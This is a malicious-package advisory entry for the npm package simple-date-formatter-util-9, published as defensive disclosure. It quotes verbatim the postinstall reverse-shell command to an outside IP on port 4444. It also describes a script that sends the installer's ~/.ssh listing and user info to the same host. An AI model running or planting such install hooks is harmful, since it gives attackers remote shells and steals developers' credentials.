MAL-2026-11547

    Dashboard / Malicious Package / MAL-2026-11547

    MAL-2026-11547

    Published: 4 Aug 2026Last Modified: 4 Aug 2026

    Summary: Malicious code in simple-date-formatter-util-9 (npm)

    Details: Source: amazon-inspector (3f3571b881ec73a3ebf6f381b14455f9eff112ba2166366858cfca59b56b2840) package.json declares a postinstall lifecycle hook that executes `bash -i >& /dev/tcp/124.221.154.135/4444 0>&1 &`, opening an interactive reverse shell from the installer's host to 124.221.154.135 on TCP/4444 at `npm install` time. The tarball also ships postinstall.js, which enumerates the installer's ~/.ssh directory with fs.readdirSync and POSTs the results together with os.userInfo() to https://124.221.154.135/post. The package name and 'date formatter' framing are a cover story; the shipped code is an install-time backdoor plus credential-exfiltration payload targeting the installer.

    Affected packages

    Package

    Name: simple-date-formatter-util-9

    Purl: pkg:npm/simple-date-formatter-util-9

    Affected ranges

    Type: N/A

    Events:

    Introduced- None
    Fixed -None

    Affected versions

    1.0.0
    MAL-2026-11547 | CVE-DB